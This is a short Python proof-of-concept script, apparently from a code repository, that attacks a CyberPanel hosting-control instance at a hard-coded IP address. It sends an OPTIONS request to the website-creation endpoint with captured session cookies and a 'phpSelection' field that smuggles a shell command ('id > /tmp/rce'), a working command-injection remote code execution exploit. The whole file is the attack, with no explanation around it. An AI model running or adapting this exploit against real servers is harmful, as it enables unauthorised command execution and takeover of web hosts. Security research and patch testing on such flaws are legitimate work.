1- import requests
2-
3- url = "https://95.217.125.210:8090/websites/submitWebsiteCreation"
4- headers = {
5- "Host" : "95.217.125.210:8090" ,
6- "User-Agent" : "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0" ,
7- "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8" ,
8- "Accept-Language" : "en-US,en;q=0.5" ,
9- "Accept-Encoding" : "gzip, deflate, br, zstd" ,
10- "Referer" : "https://95.217.125.210:8090/" ,
11- "Connection" : "keep-alive" ,
12- "Cookie" : "csrftoken=yWFDXndgjcsNYj7z8IYozbCQUBj4eLjXsG14u1PQay1lrwohlnqLHG5fwTuRC8I0; smtoken=7c09dd03817bdfebcaf0a97be32628c480663479; django_language=en; SignonSession=422tgvnrnd2f97lem1e2q0l76l; AIOHTTP_SESSION=\" gAAAAABnG8rXm2L1JmWTEqI8BGKHlWUvCQLuvN_VXWu-6r25Rk811sSjtcEK1-kuE-TrQTOwmN2K2xianVlqB3d70QcTeuQwH6a8yRfpi1UMDlysd8W10Xk8h4I_H77EFhZ01d05GImBipmznQIrQ54ZUBWt7ygx8JW52DYaG94Rd9slB3CZqpc=\" ; sessionid=tsiqhd7qkcqh393qkdy7oteiagb046sl" ,
13- "Upgrade-Insecure-Requests" : "1" ,
14- "Sec-Fetch-Dest" : "document" ,
15- "Sec-Fetch-Mode" : "navigate" ,
16- "Sec-Fetch-Site" : "same-origin" ,
17- "Sec-Fetch-User" : "?1" ,
18- "Priority" : "u=0, i" ,
19- "Pragma" : "no-cache" ,
20- "Cache-Control" : "no-cache"
21- }
22-
23- data = {
24- "package" : "Default" ,
25- "domainName" : "cyberpanel.net" ,
26- "ownerEmail" : "cyber@gmail.com" ,
27- "phpSelection" : "PHP 7.4; id > /tmp/rce; #" ,
28- "ssl" : "on" ,
29- "websiteOwner" : "admin" ,
30- "dkimCheck" : "0" ,
31- "openBasedir" : "on" ,
32- "mailDomain" : "0" ,
33- "apacheBackend" : "0"
34- }
35-
36- response = requests .options (url , headers = headers , json = data , verify = False )
37-
38- print (response .status_code )
39- print (response .text )
0 commit comments